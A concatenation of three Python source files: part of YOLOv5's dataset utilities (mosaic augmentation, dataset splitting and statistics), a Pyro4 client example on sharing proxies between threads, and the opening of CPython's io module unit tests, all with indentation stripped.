img4 = np.full(
(s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8
) # base image with 4 tiles
x1a, y1a, x2a, y2a = (
max(xc - w, 0),
max(yc - h, 0),
xc,
yc,
) # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = (
w - (x2a - x1a),
h - (y2a - y1a),
w,
h,
) # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(
labels[:, 1:], w, h, padw, padh
) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(
img4, labels4, segments4, p=self.hyp["copy_paste"]
)
img4, labels4 = random_perspective(
img4,
labels4,
segments4,
degrees=self.hyp["degrees"],
translate=self.hyp["translate"],
scale=self.hyp["scale"],
shear=self.hyp["shear"],
perspective=self.hyp["perspective"],
border=self.mosaic_border,
) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(
self.indices, k=8
) # 8 additional image indices
random.shuffle(indices)
hp, wp = -1, -1 # height, width previous
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img9
if i == 0: # center
img9 = np.full(
(s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8
) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(
labels[:, 1:], w, h, padx, pady
) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[
y1 - pady :, x1 - padx :
] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (
int(random.uniform(0, s)) for _ in self.mosaic_border
) # mosaic center x, y
img9 = img9[yc : yc + 2 * s, xc : xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(
img9,
labels9,
segments9,
degrees=self.hyp["degrees"],
translate=self.hyp["translate"],
scale=self.hyp["scale"],
shear=self.hyp["shear"],
perspective=self.hyp["perspective"],
border=self.mosaic_border,
) # border to remove
return img9, labels9
@staticmethod
def collate_fn(batch):
im, label, path, shapes = zip(*batch) # transposed
for i, lb in enumerate(label):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
im4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(
img[i].unsqueeze(0).float(),
scale_factor=2.0,
mode="bilinear",
align_corners=False,
)[0].type(img[i].type())
lb = label[i]
else:
im = torch.cat(
(
torch.cat((img[i], img[i + 1]), 1),
torch.cat((img[i + 2], img[i + 3]), 1),
),
2,
)
lb = (
torch.cat(
(
label[i],
label[i + 1] + ho,
label[i + 2] + wo,
label[i + 3] + ho + wo,
),
0,
)
* s
)
im4.append(im)
label4.append(lb)
for i, lb in enumerate(label4):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def create_folder(path="./new"):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path=DATASETS_DIR / "coco128"):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(str(path) + "_flat")
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + "/**/*.*", recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(
path=DATASETS_DIR / "coco128",
): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / "classifier") if (
path / "classifier"
).is_dir() else None # remove existing
files = list(path.rglob("*.*"))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array(
[x.split() for x in f.read().strip().splitlines()],
dtype=np.float32,
) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (
(path / "classifier")
/ f"{c}"
/ f"{path.stem}_{im_file.stem}_{j}.jpg"
) # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(
str(f), im[b[1] : b[3], b[0] : b[2]]
), f"box failure in {f}"
def autosplit(
path=DATASETS_DIR / "coco128/images", weights=(0.9, 0.1, 0.0), annotated_only=False
):
"""Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(
x for x in path.rglob("*.*") if x.suffix[1:].lower() in IMG_FORMATS
) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices(
[0, 1, 2], weights=weights, k=n
) # assign each image to a split
txt = [
"autosplit_train.txt",
"autosplit_val.txt",
"autosplit_test.txt",
] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(
f"Autosplitting images from {path}"
+ ", using *.txt labeled images only" * annotated_only
)
for i, img in tqdm(zip(indices, files), total=n):
if (
not annotated_only or Path(img2label_paths([str(img)])[0]).exists()
): # check label
with open(path.parent / txt[i], "a") as f:
f.write(
"./" + img.relative_to(path.parent).as_posix() + "\n"
) # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = (
0,
0,
0,
0,
"",
[],
) # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f"image size {shape} <10 pixels"
assert im.format.lower() in IMG_FORMATS, f"invalid image format {im.format}"
if im.format.lower() in ("jpg", "jpeg"):
with open(im_file, "rb") as f:
f.seek(-2, 2)
if f.read() != b"\xff\xd9": # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(
im_file, "JPEG", subsampling=0, quality=100
)
msg = f"{prefix}WARNING: {im_file}: corrupt JPEG restored and saved"
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
lb = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any(len(x) > 6 for x in lb): # is segment
classes = np.array([x[0] for x in lb], dtype=np.float32)
segments = [
np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in lb
] # (cls, xy1...)
lb = np.concatenate(
(classes.reshape(-1, 1), segments2boxes(segments)), 1
) # (cls, xywh)
lb = np.array(lb, dtype=np.float32)
nl = len(lb)
if nl:
assert (
lb.shape[1] == 5
), f"labels require 5 columns, {lb.shape[1]} columns detected"
assert (lb >= 0).all(), f"negative label values {lb[lb < 0]}"
assert (
lb[:, 1:] <= 1
).all(), f"non-normalized or out of bounds coordinates {lb[:, 1:][lb[:, 1:] > 1]}"
_, i = np.unique(lb, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
lb = lb[i] # remove duplicates
if segments:
segments = segments[i]
msg = f"{prefix}WARNING: {im_file}: {nl - len(i)} duplicate labels removed"
else:
ne = 1 # label empty
lb = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
lb = np.zeros((0, 5), dtype=np.float32)
return im_file, lb, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f"{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}"
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(
path="coco128.yaml", autodownload=False, verbose=False, profile=False, hub=False
):
"""Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('path/to/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith(".zip"): # path is data.zip
assert Path(path).is_file(), f"Error unzipping {path}, file not found"
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix("") # dataset directory == zip name
return (
True,
str(dir),
next(dir.rglob("*.yaml")),
) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, "JPEG", quality=75, optimize=True) # save
except Exception as e: # use OpenCV
print(f"WARNING: HUB ops PIL failure {f}: {e}")
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(
im,
(int(im_width * r), int(im_height * r)),
interpolation=cv2.INTER_AREA,
)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors="ignore") as f:
data = yaml.safe_load(f) # data dict
if zipped:
data["path"] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data["path"] + ("-hub" if hub else ""))
stats = {"nc": data["nc"], "names": data["names"]} # statistics dictionary
for split in "train", "val", "test":
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc="Statistics"):
x.append(np.bincount(label[:, 0].astype(int), minlength=data["nc"]))
x = np.array(x) # shape(128x80)
stats[split] = {
"instance_stats": {"total": int(x.sum()), "per_class": x.sum(0).tolist()},
"image_stats": {
"total": dataset.n,
"unlabelled": int(np.all(x == 0, 1).sum()),
"per_class": (x > 0).sum(0).tolist(),
},
"labels": [
{str(Path(k).name): round_labels(v.tolist())}
for k, v in zip(dataset.im_files, dataset.labels)
],
}
if hub:
im_dir = hub_dir / "images"
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(
ThreadPool(NUM_THREADS).imap(hub_ops, dataset.im_files),
total=dataset.n,
desc="HUB Ops",
):
pass
# Profile
stats_path = hub_dir / "stats.json"
if profile:
for _ in range(1):
file = stats_path.with_suffix(".npy")
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(
f"stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write"
)
file = stats_path.with_suffix(".json")
t1 = time.time()
with open(file, "w") as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(
f"stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write"
)
# Save, print and return
if hub:
print(f"Saving {stats_path.resolve()}...")
with open(stats_path, "w") as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
client.py | from __future__ import print_function
import sys
import time
import Pyro4
from Pyro4 import threadutil
if sys.version_info < (3, 0):
current_thread = threadutil.currentThread
else:
current_thread = threadutil.current_thread
stop = False
def myThread(nsproxy, proxy):
global stop
name = current_thread().getName()
try:
while not stop:
result = nsproxy.list(prefix="example.")
result = proxy.method("the quick brown fox jumps over the lazy dog")
except Exception:
x = sys.exc_info()[1]
print("**** Exception in thread %s: {%s} %s" % (name, type(x), x))
nsproxy = Pyro4.naming.locateNS()
proxy = Pyro4.core.Proxy("PYRONAME:example.proxysharing")
# now create a handful of threads and give each of them the same two proxy objects
threads = []
for i in range(5):
thread = threadutil.Thread(target=myThread, args=(nsproxy, proxy))
# thread.setDaemon(True)
thread.setDaemon(False)
threads.append(thread)
thread.start()
print("Running a bunch of threads for 5 seconds.")
print("They're hammering the name server and the test server using the same proxy.")
print("You should not see any exceptions.")
time.sleep(5)
stop = True
for thread in threads:
thread.join()
print("Done.")
print("\nNow showing why proxy sharing might not be a good idea for parallelism.")
print("Starting 10 threads with the same proxy that all call the work() method.")
def myThread2(proxy):
global stop
while not stop:
proxy.work()
stop = False
proxy.reset_work()
threads = []
for i in range(10):
thread = threadutil.Thread(target=myThread2, args=[proxy])
thread.setDaemon(False)
threads.append(thread)
thread.start()
print("waiting 5 seconds")
start = time.time()
time.sleep(5)
print("waiting until threads have stopped...")
stop = True
for thread in threads:
thread.join()
duration = int(time.time() - start)
print("--> time until everything completed: %.2f" % duration)
print("--> work done on the server: %d" % proxy.get_work_done())
print("you can see that the 10 threads are waiting for each other to complete,")
print("and that not a lot of work has been done on the server.")
print("\nDoing the same again but every thread now has its own proxy.")
print("Starting 10 threads with different proxies that all call the work() method.")
proxy.reset_work()
stop = False
threads = []
for i in range(10):
proxy = Pyro4.core.Proxy(proxy._pyroUri) # create a new proxy
thread = threadutil.Thread(target=myThread2, args=[proxy])
thread.setDaemon(False)
threads.append(thread)
thread.start()
print("waiting 5 seconds")
start = time.time()
time.sleep(5)
print("waiting until threads have stopped...")
stop = True
for thread in threads:
thread.join()
duration = int(time.time() - start)
print("--> time until everything completed: %.2f" % duration)
print("--> work done on the server: %d" % proxy.get_work_done())
print("you can see that this time the 10 threads didn't have to wait for each other,")
print("and that they got a lot more work done because they really ran in parallel.")
|
test_io.py | """Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
